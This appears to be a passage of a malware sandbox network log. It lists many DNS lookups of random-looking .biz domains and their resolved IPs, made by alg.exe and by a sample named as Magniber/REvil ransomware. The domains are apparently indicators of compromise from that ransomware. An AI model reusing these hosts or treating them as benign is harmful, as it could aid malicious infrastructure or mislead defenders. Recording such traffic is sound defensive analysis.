deoci.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

deoci.biz

DNS Response

18.208.156.248
8.8.8.8:53

gytujflc.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

gytujflc.biz

DNS Response

208.100.26.245
8.8.8.8:53

qaynky.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

qaynky.biz

DNS Response

13.251.16.150
8.8.8.8:53

bumxkqgxu.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

bumxkqgxu.biz

DNS Response

44.221.84.105
8.8.8.8:53

dwrqljrr.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

dwrqljrr.biz

DNS Response

54.244.188.177
8.8.8.8:53

nqwjmb.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

nqwjmb.biz

DNS Response

35.164.78.200
8.8.8.8:53

bumxkqgxu.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

bumxkqgxu.biz

DNS Response

44.221.84.105
8.8.8.8:53

dwrqljrr.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

dwrqljrr.biz

DNS Response

54.244.188.177
8.8.8.8:53

ytctnunms.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

ytctnunms.biz

DNS Response

3.94.10.34
8.8.8.8:53

myups.biz

dns

alg.exe

55 B
87 B
1
1

DNS Request

myups.biz

DNS Response

165.160.13.20

165.160.15.20
8.8.8.8:53

nqwjmb.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

nqwjmb.biz

DNS Response

35.164.78.200
8.8.8.8:53

oshhkdluh.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

oshhkdluh.biz

DNS Response

54.244.188.177
8.8.8.8:53

ytctnunms.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

ytctnunms.biz

DNS Response

3.94.10.34
8.8.8.8:53

myups.biz

dns

alg.exe

55 B
87 B
1
1

DNS Request

myups.biz

DNS Response

165.160.15.20

165.160.13.20
8.8.8.8:53

yunalwv.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

yunalwv.biz

DNS Response

208.100.26.245
8.8.8.8:53

jpskm.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

jpskm.biz

DNS Response

34.211.97.45
8.8.8.8:53

oshhkdluh.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

oshhkdluh.biz

DNS Response

54.244.188.177
8.8.8.8:53

lrxdmhrr.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

lrxdmhrr.biz

DNS Response

54.244.188.177
8.8.8.8:53

yunalwv.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

yunalwv.biz

DNS Response

208.100.26.245
8.8.8.8:53

jpskm.biz

dns

alg.exe

110 B
142 B
2
2

DNS Request

jpskm.biz

DNS Response

34.211.97.45

DNS Request

mjheo.biz

DNS Response

44.221.84.105
8.8.8.8:53

wllvnzb.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

wllvnzb.biz

DNS Response

18.141.10.107
8.8.8.8:53

lrxdmhrr.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

lrxdmhrr.biz

DNS Response

54.244.188.177
8.8.8.8:53

wllvnzb.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

wllvnzb.biz

DNS Response

18.141.10.107
8.8.8.8:53

gnqgo.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

gnqgo.biz

DNS Response

18.208.156.248
8.8.8.8:53

jhvzpcfg.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

jhvzpcfg.biz

DNS Response

44.221.84.105
8.8.8.8:53

acwjcqqv.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

acwjcqqv.biz

DNS Response

18.141.10.107
8.8.8.8:53

gnqgo.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

gnqgo.biz

DNS Response

18.208.156.248
8.8.8.8:53

jhvzpcfg.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

jhvzpcfg.biz

DNS Response

44.221.84.105
8.8.8.8:53

acwjcqqv.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

acwjcqqv.biz

DNS Response

18.141.10.107
8.8.8.8:53

lejtdj.biz

dns

alg.exe

56 B
118 B
1
1

DNS Request

lejtdj.biz
8.8.8.8:53

vyome.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

vyome.biz

DNS Response

44.213.104.86
8.8.8.8:53

yauexmxk.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

yauexmxk.biz

DNS Response

18.208.156.248
8.8.8.8:53

iuzpxe.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

iuzpxe.biz

DNS Response

13.251.16.150
8.8.8.8:53

lejtdj.biz

dns

alg.exe

56 B
118 B
1
1

DNS Request

lejtdj.biz
8.8.8.8:53

vyome.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

vyome.biz

DNS Response

44.213.104.86
8.8.8.8:53

yauexmxk.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

yauexmxk.biz

DNS Response

18.208.156.248
8.8.8.8:53

iuzpxe.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

iuzpxe.biz

DNS Response

13.251.16.150
8.8.8.8:53

sxmiywsfv.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

sxmiywsfv.biz

DNS Response

13.251.16.150
8.8.8.8:53

sxmiywsfv.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

sxmiywsfv.biz

DNS Response

13.251.16.150
8.8.8.8:53

vrrazpdh.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

vrrazpdh.biz

DNS Response

34.211.97.45
8.8.8.8:53

ftxlah.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

ftxlah.biz

DNS Response

47.129.31.212
8.8.8.8:53

vrrazpdh.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

vrrazpdh.biz

DNS Response

34.211.97.45
8.8.8.8:53

ftxlah.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

ftxlah.biz

DNS Response

47.129.31.212
8.8.8.8:53

typgfhb.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

typgfhb.biz

DNS Response

13.251.16.150
8.8.8.8:53

typgfhb.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

typgfhb.biz

DNS Response

13.251.16.150
8.8.8.8:53

esuzf.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

esuzf.biz

DNS Response

34.211.97.45
8.8.8.8:53

gvijgjwkh.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

gvijgjwkh.biz

DNS Response

3.94.10.34
8.8.8.8:53

esuzf.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

esuzf.biz

DNS Response

34.211.97.45
8.8.8.8:53

qpnczch.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

qpnczch.biz

DNS Response

44.213.104.86
8.8.8.8:53

brsua.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

brsua.biz

DNS Response

3.254.94.185
8.8.8.8:53

gvijgjwkh.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

gvijgjwkh.biz

DNS Response

3.94.10.34
8.8.8.8:53

dlynankz.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

dlynankz.biz

DNS Response

85.214.228.140
8.8.8.8:53

qpnczch.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

qpnczch.biz

DNS Response

44.213.104.86
8.8.8.8:53

oflybfv.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

oflybfv.biz

DNS Response

47.129.31.212
8.8.8.8:53

brsua.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

brsua.biz

DNS Response

3.254.94.185
8.8.8.8:53

dlynankz.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

dlynankz.biz

DNS Response

85.214.228.140
8.8.8.8:53

oflybfv.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

oflybfv.biz

DNS Response

47.129.31.212
8.8.8.8:53

yhqqc.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

yhqqc.biz

DNS Response

34.211.97.45
8.8.8.8:53

mnjmhp.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

mnjmhp.biz

DNS Response

47.129.31.212
8.8.8.8:53

yhqqc.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

yhqqc.biz

DNS Response

34.211.97.45
8.8.8.8:53

mnjmhp.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

mnjmhp.biz

DNS Response

47.129.31.212
8.8.8.8:53

opowhhece.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

opowhhece.biz

DNS Response

18.208.156.248
8.8.8.8:53

zjbpaao.biz

dns

alg.exe

57 B
119 B
1
1

DNS Request

zjbpaao.biz
8.8.8.8:53

jdhhbs.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

jdhhbs.biz

DNS Response

13.251.16.150
8.8.8.8:53

opowhhece.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

opowhhece.biz

DNS Response

18.208.156.248
8.8.8.8:53

zjbpaao.biz

dns

alg.exe

57 B
119 B
1
1

DNS Request

zjbpaao.biz
8.8.8.8:53

jdhhbs.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

jdhhbs.biz

DNS Response

13.251.16.150
8.8.8.8:53

mgmsclkyu.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

mgmsclkyu.biz

DNS Response

34.246.200.160
8.8.8.8:53

warkcdu.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

warkcdu.biz

DNS Response

18.141.10.107
8.8.8.8:53

mgmsclkyu.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

mgmsclkyu.biz

DNS Response

34.246.200.160
8.8.8.8:53

warkcdu.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

warkcdu.biz

DNS Response

18.141.10.107
8.8.8.8:53

gcedd.biz

dns

alg.exe

110 B
71 B
2
1

DNS Request

gcedd.biz

DNS Request

gcedd.biz

DNS Response

13.251.16.150
8.8.8.8:53

gcedd.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

gcedd.biz

DNS Response

13.251.16.150
8.8.8.8:53

jwkoeoqns.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

jwkoeoqns.biz

DNS Response

18.208.156.248
8.8.8.8:53

xccjj.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

xccjj.biz

DNS Response

44.213.104.86
8.8.8.8:53

jwkoeoqns.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

jwkoeoqns.biz

DNS Response

18.208.156.248
8.8.8.8:53

hehckyov.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

hehckyov.biz

DNS Response

44.221.84.105
8.8.8.8:53

xccjj.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

xccjj.biz

DNS Response

44.213.104.86
8.8.8.8:53

hehckyov.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

hehckyov.biz

DNS Response

44.221.84.105
8.8.8.8:53

rynmcq.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

rynmcq.biz

DNS Response

54.244.188.177
8.8.8.8:53

rynmcq.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

rynmcq.biz

DNS Response

54.244.188.177
8.8.8.8:53

uaafd.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

uaafd.biz

DNS Response

3.254.94.185
8.8.8.8:53

uaafd.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

uaafd.biz

DNS Response

3.254.94.185
8.8.8.8:53

eufxebus.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

eufxebus.biz

DNS Response

18.141.10.107
8.8.8.8:53

eufxebus.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

eufxebus.biz

DNS Response

18.141.10.107
8.8.8.8:53

pwlqfu.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

pwlqfu.biz

DNS Response

34.246.200.160
8.8.8.8:53

pwlqfu.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

pwlqfu.biz

DNS Response

34.246.200.160
8.8.8.8:53

rrqafepng.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

rrqafepng.biz

DNS Response

47.129.31.212
8.8.8.8:53

rrqafepng.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

rrqafepng.biz

DNS Response

47.129.31.212
8.8.8.8:53

ctdtgwag.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

ctdtgwag.biz

DNS Response

3.94.10.34
8.8.8.8:53

ctdtgwag.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

ctdtgwag.biz

DNS Response

3.94.10.34
8.8.8.8:53

tnevuluw.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

tnevuluw.biz

DNS Response

35.164.78.200
8.8.8.8:53

tnevuluw.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

tnevuluw.biz

DNS Response

35.164.78.200
8.8.8.8:53

whjovd.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

115 B
147 B
2
2

DNS Request

whjovd.biz

DNS Response

18.141.10.107

DNS Request

znwbniskf.biz

DNS Response

47.129.31.212
8.8.8.8:53

whjovd.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

whjovd.biz

DNS Response

18.141.10.107
8.8.8.8:53

crl.microsoft.com

dns

mscorsvw.exe

63 B
162 B
1
1

DNS Request

crl.microsoft.com

DNS Response

2.17.107.81

2.17.107.9
8.8.8.8:53

gjogvvpsf.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

gjogvvpsf.biz

DNS Response

208.100.26.245
8.8.8.8:53

gjogvvpsf.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

gjogvvpsf.biz

DNS Response

208.100.26.245
8.8.8.8:53

reczwga.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

reczwga.biz

DNS Response

44.221.84.105
8.8.8.8:53

reczwga.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

reczwga.biz

DNS Response

44.221.84.105
8.8.8.8:53

bghjpy.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

bghjpy.biz

DNS Response

34.211.97.45
8.8.8.8:53

bghjpy.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

bghjpy.biz

DNS Response

34.211.97.45
8.8.8.8:53

damcprvgv.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

damcprvgv.biz

DNS Response

18.208.156.248
8.8.8.8:53

damcprvgv.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

damcprvgv.biz

DNS Response

18.208.156.248
8.8.8.8:53

ocsvqjg.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

ocsvqjg.biz

DNS Response

3.254.94.185
8.8.8.8:53

ocsvqjg.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

ocsvqjg.biz

DNS Response

3.254.94.185
8.8.8.8:53

ywffr.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

ywffr.biz

DNS Response

54.244.188.177
8.8.8.8:53

ywffr.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

ywffr.biz

DNS Response

54.244.188.177
8.8.8.8:53

ecxbwt.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

ecxbwt.biz

DNS Response

54.244.188.177
8.8.8.8:53

ecxbwt.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

ecxbwt.biz

DNS Response

54.244.188.177
8.8.8.8:53

pectx.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

pectx.biz

DNS Response

44.213.104.86
8.8.8.8:53

pectx.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

pectx.biz

DNS Response

44.213.104.86
8.8.8.8:53

zyiexezl.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

zyiexezl.biz

DNS Response

18.208.156.248
8.8.8.8:53

zyiexezl.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

zyiexezl.biz

DNS Response

18.208.156.248
8.8.8.8:53

banwyw.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

banwyw.biz

DNS Response

44.221.84.105
8.8.8.8:53

banwyw.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

banwyw.biz

DNS Response

44.221.84.105
8.8.8.8:53

muapr.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
117 B
1
1

DNS Request

muapr.biz
8.8.8.8:53

wxgzshna.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
131 B
1
1

DNS Request

wxgzshna.biz
8.8.8.8:53

zrlssa.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

zrlssa.biz

DNS Response

44.221.84.105
8.8.8.8:53

muapr.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
117 B
1
1

DNS Request

muapr.biz
8.8.8.8:53

wxgzshna.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
131 B
1
1

DNS Request

wxgzshna.biz
8.8.8.8:53

zrlssa.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

zrlssa.biz

DNS Response

44.221.84.105
8.8.8.8:53

jlqltsjvh.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

jlqltsjvh.biz

DNS Response

18.141.10.107
8.8.8.8:53

jlqltsjvh.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

jlqltsjvh.biz

DNS Response

18.141.10.107
8.8.8.8:53

xyrgy.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

xyrgy.biz

DNS Response

18.208.156.248
8.8.8.8:53

xyrgy.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

xyrgy.biz

DNS Response

18.208.156.248
8.8.8.8:53

htwqzczce.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
91 B
1
1

DNS Request

htwqzczce.biz

DNS Response

172.234.222.143

172.234.222.138
8.8.8.8:53

htwqzczce.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
91 B
1
1

DNS Request

htwqzczce.biz

DNS Response

172.234.222.138

172.234.222.143
8.8.8.8:53

kvbjaur.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

kvbjaur.biz

DNS Response

54.244.188.177
8.8.8.8:53

kvbjaur.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

kvbjaur.biz

DNS Response

54.244.188.177
8.8.8.8:53

uphca.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

uphca.biz

DNS Response

44.221.84.105
8.8.8.8:53

uphca.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

uphca.biz

DNS Response

44.221.84.105
8.8.8.8:53

fjumtfnz.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

fjumtfnz.biz

DNS Response

34.211.97.45
8.8.8.8:53

fjumtfnz.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

fjumtfnz.biz

DNS Response

34.211.97.45
8.8.8.8:53

hlzfuyy.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

hlzfuyy.biz

DNS Response

34.211.97.45
8.8.8.8:53

hlzfuyy.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

hlzfuyy.biz

DNS Response

34.211.97.45
8.8.8.8:53

rffxu.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

rffxu.biz

DNS Response

34.246.200.160
8.8.8.8:53

rffxu.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

rffxu.biz

DNS Response

34.246.200.160
8.8.8.8:53

cikivjto.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

cikivjto.biz

DNS Response

44.213.104.86
8.8.8.8:53

cikivjto.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

cikivjto.biz

DNS Response

44.213.104.86
8.8.8.8:53

qncdaagct.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

qncdaagct.biz

DNS Response

47.129.31.212
8.8.8.8:53

qncdaagct.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

qncdaagct.biz

DNS Response

47.129.31.212
8.8.8.8:53

shpwbsrw.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

shpwbsrw.biz

DNS Response

13.251.16.150
8.8.8.8:53

shpwbsrw.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

shpwbsrw.biz

DNS Response

13.251.16.150
8.8.8.8:53

cjvgcl.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

cjvgcl.biz

DNS Response

18.208.156.248
8.8.8.8:53

cjvgcl.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

cjvgcl.biz

DNS Response

18.208.156.248
8.8.8.8:53

neazudmrq.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

neazudmrq.biz

DNS Response

44.221.84.105
8.8.8.8:53

neazudmrq.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

neazudmrq.biz

DNS Response

44.221.84.105
8.8.8.8:53

pgfsvwx.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

pgfsvwx.biz

DNS Response

18.208.156.248
8.8.8.8:53

pgfsvwx.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

pgfsvwx.biz

DNS Response

18.208.156.248
8.8.8.8:53

aatcwo.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

aatcwo.biz

DNS Response

47.129.31.212
8.8.8.8:53

aatcwo.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

aatcwo.biz

DNS Response

47.129.31.212
8.8.8.8:53

kcyvxytog.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

kcyvxytog.biz

DNS Response

18.208.156.248
8.8.8.8:53

kcyvxytog.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

kcyvxytog.biz

DNS Response

18.208.156.248
8.8.8.8:53

nwdnxrd.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

nwdnxrd.biz

DNS Response

54.244.188.177
8.8.8.8:53

nwdnxrd.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

nwdnxrd.biz

DNS Response

54.244.188.177
8.8.8.8:53

ereplfx.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

ereplfx.biz

DNS Response

44.213.104.86
8.8.8.8:53

ereplfx.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

ereplfx.biz

DNS Response

44.213.104.86
8.8.8.8:53

ptrim.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

ptrim.biz

DNS Response

18.141.10.107
8.8.8.8:53

ptrim.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

ptrim.biz

DNS Response

18.141.10.107
8.8.8.8:53

znwbniskf.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

znwbniskf.biz

DNS Response

47.129.31.212
8.8.8.8:53

cpclnad.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

cpclnad.biz

DNS Response

44.221.84.105
8.8.8.8:53

cpclnad.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

cpclnad.biz

DNS Response

44.221.84.105
8.8.8.8:53

mjheo.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

mjheo.biz

DNS Response

44.221.84.105
8.8.8.8:53

wluwplyh.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

wluwplyh.biz

DNS Response

18.141.10.107
8.8.8.8:53

wluwplyh.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

wluwplyh.biz

DNS Response

18.141.10.107
8.8.8.8:53

zgapiej.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

zgapiej.biz

DNS Response

18.208.156.248
8.8.8.8:53

zgapiej.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

zgapiej.biz

DNS Response

18.208.156.248
8.8.8.8:53

jifai.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

jifai.biz

DNS Response

44.221.84.105
8.8.8.8:53

jifai.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

jifai.biz

DNS Response

44.221.84.105
8.8.8.8:53

xnxvnn.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

